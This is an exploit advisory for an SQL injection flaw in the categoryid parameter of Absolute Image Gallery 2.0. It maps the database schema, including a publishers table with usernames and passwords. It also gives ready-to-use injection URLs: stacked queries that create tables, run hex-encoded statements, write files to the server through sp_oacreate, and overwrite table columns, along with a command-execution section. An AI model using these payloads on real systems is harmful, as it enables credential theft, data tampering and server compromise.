Absolute Image Gallery Gallery.ASP (categoryid) MSSQL Injection Exploit Type : SQL Injection Release Date : {2007-03-15} Product / Vendor : Absolute Image Gallery http://www.xigla.com/absoluteig/ Bug : http://localhost/script/gallery.asp?action=viewimage&categoryid=-SQL Inj- --------------------------------------------------------------------------------------------------------------------------------------------- Script Table/Colon Name : --------------------------------------------------------------------------------------------------------------------------------------------- Table Name : articlefiles fileid filetitle filename articleid filetype filecomment urlfile --------------------------------------------------------------------------------------------------------------------------------------------- Table Name : articles articleid posted lastupdate headline headlinedate startdate enddate source summary articleurl article status autoformat publisherid clicks editor relatedid --------------------------------------------------------------------------------------------------------------------------------------------- Table Name : iArticlesZones articleid zoneid --------------------------------------------------------------------------------------------------------------------------------------------- Table Name : plugins pluginid pplname pplfile ppldescription --------------------------------------------------------------------------------------------------------------------------------------------- Table Name : PPL1reviews reviewid articleid name reviewdate review comments isannonymous --------------------------------------------------------------------------------------------------------------------------------------------- Table Name : publishers publisherid name username password email additional plevel --------------------------------------------------------------------------------------------------------------------------------------------- Table Name : publisherszones publisherid zoneid --------------------------------------------------------------------------------------------------------------------------------------------- Table Name : xlaAIGcategories categoryid catname catdesc supercatid lastupdate catpath images allowupload --------------------------------------------------------------------------------------------------------------------------------------------- Table Name : xlaAIGimages imageid imagename imagedesc imagefile imagedate imagesize totalrating totalreviews hits categoryid status uploadedby additionalinfo embedhtml keywords copyright credit source datecreated email infourl --------------------------------------------------------------------------------------------------------------------------------------------- Table Name : xlaAIGpostcards dateposted postcardid imageid bgcolor bordercolor fonttype fontcolor recipientname recipientemail greeting bgsound sendername senderemail sendermsg --------------------------------------------------------------------------------------------------------------------------------------------- Table Name : zones zonename description template articlespz zonefont fontsize fontcolor showsource showsummary showdates showtn textalign displayhoriz cellcolor targetframe --------------------------------------------------------------------------------------------------------------------------------------------- MSSQL CMD Injection Exploit(For DBO Users) : Absolute Image Gallery MSSQL CMD Injection Exploit
Absolute Image Gallery MSSQL CMD Injection Exploit

Note : For DBO Users

Example :


Command Exec :   Search Board    

UniquE-Key{UniquE-Cracker}
UniquE@UniquE-Key.ORG
http://UniquE-Key.ORG
--------------------------------------------------------------------------------------------------------------------------------------------- Code Injection(For DBO Users) : Add Table : http://localhost/script/gallery.asp?action=viewimage&categoryid=-1;Create+table+code+(txt+varchar(8000),id+int);-- ASCII Code Add Database : http://localhost/script/gallery.asp?action=viewimage&categoryid=-1;declare+@q+varchar(8000)+select+@q=0x696E7365727420696E746F2066736F373737287478742C6964292076616C7565732827272C3129+exec(@q);-- Code Injection : http://localhost/script/gallery.asp?action=viewimage&categoryid=-1;declare+@txt+varchar(8000);select+@txt+=+(select+top+1+txt+from+code+where+id+=+1);declare+@o+int,+@f+int,+@t+int,+@ret+int+exec+sp_oacreate+'scripting.filesystemobject',+@o+out+exec+sp_oamethod+@o,+'createtextfile',+@f+out,+'c:/host',+1+exec+@ret+=+sp_oamethod+@f,+'writeline',+NULL,+@txt;-- --------------------------------------------------------------------------------------------------------------------------------------------- UPDATE(ALL users) : http://localhost/script/gallery.asp?action=viewimage&categoryid=-1 UPDATE table SET colon = 'x';-- --------------------------------------------------------------------------------------------------------------------------------------------- Tested : Absolute Image Gallery 2.0 Vulnerable : Absolute Image Gallery 2.0 Author : UniquE-Key{UniquE-Cracker} UniquE(at)UniquE-Key.Org http://www.UniquE-Key.Org